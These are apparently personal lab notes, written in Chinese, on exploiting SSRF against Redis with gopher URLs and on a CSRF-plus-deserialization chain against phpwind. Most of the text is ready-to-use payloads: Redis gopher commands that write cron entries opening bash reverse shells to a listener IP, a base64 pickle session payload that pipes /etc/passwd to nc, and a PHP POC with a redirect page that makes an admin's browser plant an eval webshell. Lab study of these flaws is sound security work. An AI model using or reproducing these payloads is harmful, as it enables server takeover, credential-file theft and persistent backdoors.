SSRF

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。

file–>读取文件

dict–>探测端口

gopher–>实现入侵

多以gopher+redis+fastcgi结合入侵

gopher+redis ：1、上传webshell（必须知道它的物理路径、redis权限要求够高、redis没有密码、安全模式必须关闭）2、写ssh 3、cron写任务计划(在Ubuntu上不成功因为文件创建权限为644，必须为600)4、利用CRLF换行头漏洞，用ssrf把redis的session写入进去，写入过程中会用python进行一个序列化，然后在redis进行读取的时候将session进行反序列化执行我们传入的代码

Web-Hacking-Lab-master

1、Centos未授权访问

1、docker拉取镜像

2、本地浏览器访问服务器2222端口，进入页面
3、进行端口探测
1）输入dict://127.0.0.1:6379发现服务器6379是开放的
2）使用工具进行时间计划写入反弹shell，生成payload

3）将payload进行url解码了解原理：

gopher://127.0.0.1:6379/_*1
$8
flushall
*3
$3
set
$1
1
$73*/1 * * * * /bin/bash -c 'sh -i >& /dev/tcp/192.168.68.136/7777 0>&1'*4
$6
config
$3
set
$3
dir
$16
/var/spool/cron/
*4
$6
config
$3
set
$10
dbfilename
$4
root
*1
$4
save
*1
$4
quit

总结：第一步清除redis数据以免影响我们写入数据（实战中不可取），set一个键，输入我们的反弹代码，然后将这个键值在Linux系统里落盘，落盘路径是/var/spool/cron/，文件名root。
4）将工具生成的payload的输入进页面，提交。
5）本机进行监听端口7777。

2、Ubuntu未授权访问

1、docker拉取镜像

2、本地浏览器访问服务器1111端口，进入页面
3、进行端口探测
1）输入dict://127.0.0.1:6379发现服务器6379是开放的
2）使用工具进行时间计划写入反弹shell，生成payload

代码分析：

gopher://127.0.0.1:6379/_*1
$8
flushall
*3
$3
set
$1
1
$75*/1 * * * * /bin/bash -c 'sh -i >& /dev/tcp/192.168.68.136/6666 0>&1'*4
$6
config
$3
set
$3
dir
$24
/var/spool/cron/crontabs
*4
$6
config
$3
set
$10
dbfilename
$4
root
*1
$4
save
*1
$4
quit

总结：基本与上同，只是落盘路径不一样，Ubuntu落盘文件是/var/spool/cron/crontabs。
3）提交payload，发现失败，无法反弹shell，可能原因有，①落盘路径不可写 ②Ubuntu的计划文件权限必须是600③redis版本没有漏洞（建议靶场使用redis5.0.5版本）
4）Ubuntu时间计划写入反弹shell失败。

3、Ubuntu传入公钥访问

1、拉取环境
2、生成公钥：

ssh-keygen -t rsa

3、用本机工具生成payload生成公钥

4、传入payload，结果如下：

由于redis版本是stable，长期稳固版本，公钥传入失败。
5、我自己在docker环境里传入我的公钥试试，然后ssh远程登录，发现成功。

4、ssrf_redis_lab_pickle_redis_lab

1、拉取环境，访问反序列化的环境页面，分析app.py文件的代码，发现系统是将session里的cookie进行base64加密序列化，然后使用的时候是将cookie进行反序列化base64解密，我们可以通过对传入的session进行伪造，写入我们的代码进行base64加密并序列化，等系统使用的时候会反序列化执行我们的代码。（flask里会默认将session进行重置，即当你覆盖完原本的session值，在执行完流程后会自动变为原本的session值）

2、查看payload原理

http://127.0.0.1:6379/_*3
$3
set
$44
session:e6d2a82e-cafb-44c1-91ac-3b271a29f24c
$92
Y3Bvc2l4CnN5c3RlbQpwMAooUydjYXQgL2V0Yy9wYXNzd2QgfCBuYyAxMjcuMC4wLjEgOTA5MScKcDEKdHAyClJwMwou

3、提交payload

python的httplib自动把%0D%0A过滤了，有些python版本会过滤，有些不会，反正就尝试一下嘛。

CSRF:windphp

- 回调函数 call_user_func_array()
- spl_autoload 、 spl_autoload_register 、 __autoload 三个函数
- 利用数组+命名空间加载相同名字的类
- 利用StdClass代替对象数组
- **将CSRF和反序列化结合，从而使只能在后台触发的序列化漏洞,变为前台getshell。降低漏洞利用条件。**
- CSRF利用技巧

POC:

<?php
namespace src\library\utility {class PwDelayRun{}
}
namespace{class PwDelayRun{private $_callback;private $_args;function __construct(){$this->_callback = ['assert'];$this->_args = [["phpinfo();exit;"]];}
}header("Content-Type: text/plain");
$obj = new stdClass();
$obj->a =  new src\library\utility\PwDelayRun();
$obj->b = new PwDelayRun();
echo urlencode(serialize($obj));
}
?>

拿到payload:

http://127.0.0.1/phpwind/admin.php?m=task&c=TaskConditionMember&a=profile&var=O%3A8%3A%22stdClass%22%3A2%3A%7Bs%3A1%3A%22a%22%3BO%3A30%3A%22src%5Clibrary%5Cutility%5CPwDelayRun%22%3A0%3A%7B%7Ds%3A1%3A%22b%22%3BO%3A10%3A%22PwDelayRun%22%3A2%3A%7Bs%3A21%3A%22%00PwDelayRun%00_callback%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22assert%22%3B%7Ds%3A17%3A%22%00PwDelayRun%00_args%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A1%3A%7Bi%3A0%3Bs%3A15%3A%22phpinfo%28%29%3Bexit%3B%22%3B%7D%7D%7D%7D

1、创建一个php文件,x写入如下代码：

<?php
header("Content-Type: image/gif");
header("Location: http://127.0.0.1/phpwind/admin.php?m=task&c=TaskConditionMember&a=profile&var=O%3A8%3A%22stdClass%22%3A2%3A%7Bs%3A1%3A%22a%22%3BO%3A30%3A%22src%5Clibrary%5Cutility%5CPwDelayRun%22%3A0%3A%7B%7Ds%3A1%3A%22b%22%3BO%3A10%3A%22PwDelayRun%22%3A2%3A%7Bs%3A21%3A%22%00PwDelayRun%00_callback%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A6%3A%22assert%22%3B%7Ds%3A17%3A%22%00PwDelayRun%00_args%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A1%3A%7Bi%3A0%3Bs%3A77%3A%22file_put_contents%28%22.%2Fshell.php%22%2C%27%3C%3Fphp+%40eval%28%24_POST%5Ba%5D%29%3B%3F%3E%27%29%3B+phpinfo%28%29%3Bexit%3B%22%3B%7D%7D%7D%7D");
?>

2、发帖，发图片，选择用代码发，代码如下：

[img]http://127.0.0.1/oupeng.php[/img]

3、可以看到此时没有shell文件

4、登录管理员账号

5、此时出现shell.php文件，反弹shell

6、测试显示成功